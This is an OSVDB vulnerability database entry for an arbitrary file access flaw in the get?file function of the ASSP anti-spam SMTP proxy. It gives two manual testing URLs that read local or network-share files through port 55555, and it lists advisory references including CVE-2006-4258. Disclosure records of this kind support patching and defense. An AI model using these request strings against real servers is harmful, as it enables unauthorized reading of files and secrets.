Anti-Spam SMTP Proxy Server (ASSP) get?file Function Arbitrary File Access

2006-08-15T11:48:44
ID OSVDB:27968
Type osvdb
Reporter OSVDB
Modified 2006-08-15T11:48:44

Description

Manual Testing Notes

http://[target]:55555/get?file=c:\dir\subdir\file.ext
http://[target]:55555/get?file=\server\share\dir\file.ext

References:

Vendor URL: http://www.asspsmtp.org/
Vendor URL: http://assp.sourceforge.net/
Secunia Advisory ID: 21523
Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-08/0480.html
FrSIRT Advisory: ADV-2006-3289
CVE-2006-4258
Bugtraq ID: 19545